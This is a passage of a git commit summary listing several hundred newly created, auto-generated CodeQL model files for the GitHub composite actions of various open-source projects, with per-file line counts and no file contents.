.../medusajs_medusa.model.yml | 8 +++++++ .../metabase_metabase.model.yml | 17 ++++++++++++++ ...etamask_action-create-release-pr.model.yml | 8 +++++++ .../metamask_action-npm-publish.model.yml | 6 +++++ .../microsoft_fluentui.model.yml | 6 +++++ .../microsoft_playwright.model.yml | 11 ++++++++++ .../composite-actions/microsoft_wsl.model.yml | 7 ++++++ .../milvus-io_milvus.model.yml | 6 +++++ .../composite-actions/mlflow_mlflow.model.yml | 6 +++++ .../modin-project_modin.model.yml | 8 +++++++ .../mozilla_addons-server.model.yml | 7 ++++++ .../mozilla_bedrock.model.yml | 6 +++++ .../mozilla_sccache.model.yml | 6 +++++ .../msys2_setup-msys2.model.yml | 6 +++++ .../mumble-voip_mumble.model.yml | 8 +++++++ .../composite-actions/nasa_fprime.model.yml | 6 +++++ .../nats-io_nats-server.model.yml | 8 +++++++ ..._optic-release-automation-action.model.yml | 8 +++++++ .../composite-actions/nektos_act.model.yml | 12 ++++++++++ ...4j-contrib_neo4j-apoc-procedures.model.yml | 7 ++++++ .../neondatabase_neon.model.yml | 13 +++++++++++ .../composite-actions/neovim_neovim.model.yml | 6 +++++ .../composite-actions/nhost_nhost.model.yml | 6 +++++ .../nix-community_nixos-wsl.model.yml | 7 ++++++ .../composite-actions/novuhq_novu.model.yml | 6 +++++ .../composite-actions/nymtech_nym.model.yml | 6 +++++ .../obsproject_obs-studio.model.yml | 19 ++++++++++++++++ .../composite-actions/ocaml_dune.model.yml | 10 +++++++++ .../oneflow-inc_oneflow.model.yml | 12 ++++++++++ ...metry_opentelemetry-ruby-contrib.model.yml | 8 +++++++ ...pen-telemetry_opentelemetry-ruby.model.yml | 7 ++++++ .../open-watcom_open-watcom-v2.model.yml | 8 +++++++ .../openapitools_openapi-generator.model.yml | 8 +++++++ .../composite-actions/openjdk_jdk.model.yml | 6 +++++ ...pensearch-project_opensearch-net.model.yml | 8 +++++++ .../opensearch-project_security.model.yml | 6 +++++ .../opentrons_opentrons.model.yml | 12 ++++++++++ .../openvinotoolkit_openvino.model.yml | 16 ++++++++++++++ ...enzeppelin-contracts-upgradeable.model.yml | 12 ++++++++++ ...nzeppelin_openzeppelin-contracts.model.yml | 12 ++++++++++ .../composite-actions/oppia_oppia.model.yml | 6 +++++ .../composite-actions/oracle_graal.model.yml | 7 ++++++ .../oracle_truffleruby.model.yml | 6 +++++ .../orhun_git-cliff.model.yml | 6 +++++ .../composite-actions/oven-sh_bun.model.yml | 7 ++++++ .../owntracks_android.model.yml | 7 ++++++ .../pandas-dev_pandas.model.yml | 8 +++++++ .../pardeike_harmony.model.yml | 9 ++++++++ .../pennylaneai_pennylane.model.yml | 7 ++++++ .../phalcon_cphalcon.model.yml | 13 +++++++++++ .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++ .../composite-actions/php_php-src.model.yml | 10 +++++++++ .../phpdocumentor_phpdocumentor.model.yml | 7 ++++++ ...necone-io_pinecone-python-client.model.yml | 10 +++++++++ .../composite-actions/pixijs_pixijs.model.yml | 6 +++++ .../posthog_posthog.model.yml | 7 ++++++ .../composite-actions/primer_react.model.yml | 7 ++++++ .../project-chip_connectedhomeip.model.yml | 8 +++++++ .../projectnessie_nessie.model.yml | 9 ++++++++ .../composite-actions/psf_black.model.yml | 6 +++++ .../pyca_cryptography.model.yml | 6 +++++ .../pyg-team_pytorch_geometric.model.yml | 8 +++++++ .../python-poetry_poetry.model.yml | 6 +++++ .../composite-actions/python_mypy.model.yml | 7 ++++++ .../quarto-dev_quarto-cli.model.yml | 15 +++++++++++++ .../composite-actions/quay_clair.model.yml | 11 ++++++++++ .../quickwit-oss_quickwit.model.yml | 7 ++++++ .../composite-actions/r-lib_actions.model.yml | 18 +++++++++++++++ .../randombit_botan.model.yml | 7 ++++++ .../raspberrypi_documentation.model.yml | 12 ++++++++++ .../ray-project_kuberay.model.yml | 6 +++++ .../readthedocs_actions.model.yml | 10 +++++++++ .../reflex-dev_reflex.model.yml | 6 +++++ .../renovatebot_renovate.model.yml | 6 +++++ .../rethinkdb_rethinkdb.model.yml | 9 ++++++++ .../composite-actions/risc0_risc0.model.yml | 9 ++++++++ .../rocketchat_rocket.chat.model.yml | 9 ++++++++ .../composite-actions/rook_rook.model.yml | 9 ++++++++ .../composite-actions/roots_trellis.model.yml | 6 +++++ .../composite-actions/ruby_debug.model.yml | 6 +++++ .../composite-actions/ruby_ruby.model.yml | 10 +++++++++ .../composite-actions/rusefi_rusefi.model.yml | 10 +++++++++ .../saltstack_salt.model.yml | 14 ++++++++++++ .../sap_sapmachine.model.yml | 6 +++++ .../scala-native_scala-native.model.yml | 7 ++++++ .../composite-actions/scitools_iris.model.yml | 8 +++++++ .../scylladb_scylla-operator.model.yml | 9 ++++++++ .../shader-slang_slang.model.yml | 10 +++++++++ .../shaka-project_shaka-player.model.yml | 9 ++++++++ ...ode_react-webpack-rails-tutorial.model.yml | 7 ++++++ .../simple-icons_simple-icons.model.yml | 6 +++++ .../slint-ui_slint.model.yml | 7 ++++++ .../solidusio_solidus.model.yml | 9 ++++++++ .../composite-actions/solo-io_gloo.model.yml | 6 +++++ .../composite-actions/sonarr_sonarr.model.yml | 12 ++++++++++ .../sonic-pi-net_sonic-pi.model.yml | 8 +++++++ .../spacedriveapp_spacedrive.model.yml | 6 +++++ .../spockframework_spock.model.yml | 6 +++++ .../spring-io_initializr.model.yml | 7 ++++++ .../spring-io_start.spring.io.model.yml | 7 ++++++ .../spring-projects_spring-boot.model.yml | 7 ++++++ ...spring-projects_spring-framework.model.yml | 7 ++++++ .../spring-projects_spring-graphql.model.yml | 7 ++++++ .../square_workflow-kotlin.model.yml | 8 +++++++ .../stefanprodan_podinfo.model.yml | 7 ++++++ .../composite-actions/stellar_go.model.yml | 6 +++++ .../streetsidesoftware_cspell.model.yml | 6 +++++ .../subquery_subql.model.yml | 6 +++++ .../swagger-api_swagger-codegen.model.yml | 11 ++++++++++ .../swagger-api_swagger-parser.model.yml | 11 ++++++++++ .../tarantool_tarantool.model.yml | 9 ++++++++ .../telepresenceio_telepresence.model.yml | 6 +++++ .../tensorflow_datasets.model.yml | 7 ++++++ .../texstudio-org_texstudio.model.yml | 6 +++++ .../toeverything_affine.model.yml | 13 +++++++++++ .../treeverse_lakefs.model.yml | 8 +++++++ .../trezor_trezor-firmware.model.yml | 9 ++++++++ .../tribler_tribler.model.yml | 10 +++++++++ .../trunk-io_trunk-action.model.yml | 13 +++++++++++ .../composite-actions/unidata_metpy.model.yml | 6 +++++ .../unstructured-io_unstructured.model.yml | 6 +++++ .../composite-actions/vercel_turbo.model.yml | 6 +++++ .../vesoft-inc_nebula.model.yml | 12 ++++++++++ .../composite-actions/vkcom_vkui.model.yml | 11 ++++++++++ .../vuetifyjs_vuetify.model.yml | 9 ++++++++ .../wagoodman_dive.model.yml | 6 +++++ ...lletconnect_walletconnectswiftv2.model.yml | 13 +++++++++++ .../composite-actions/wazuh_wazuh.model.yml | 8 +++++++ .../web-infra-dev_rspack.model.yml | 8 +++++++ .../webassembly_wabt.model.yml | 6 +++++ .../composite-actions/wntrblm_nox.model.yml | 6 +++++ .../composite-actions/xrplf_rippled.model.yml | 8 +++++++ .../composite-actions/zcash_zcash.model.yml | 7 ++++++ .../zenml-io_zenml.model.yml | 6 +++++ .../composite-actions/zeroc-ice_ice.model.yml | 7 ++++++ 315 files changed, 2594 insertions(+) create mode 100644 ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_grype.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_syft.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_awx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_brpc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_opendal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pekko.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_superset.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armbian_build.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/badges_shields.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coder_coder.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/discourse_.github.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emberjs_data.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/erlang_otp.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_flow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/google_dagger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/grote_transportr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/infracost_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_graal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/owntracks_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/php_php-src.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/primer_react.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/psf_black.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python_mypy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quay_clair.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/randombit_botan.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rook_rook.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/roots_trellis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_debug.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scitools_iris.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml create mode 100644 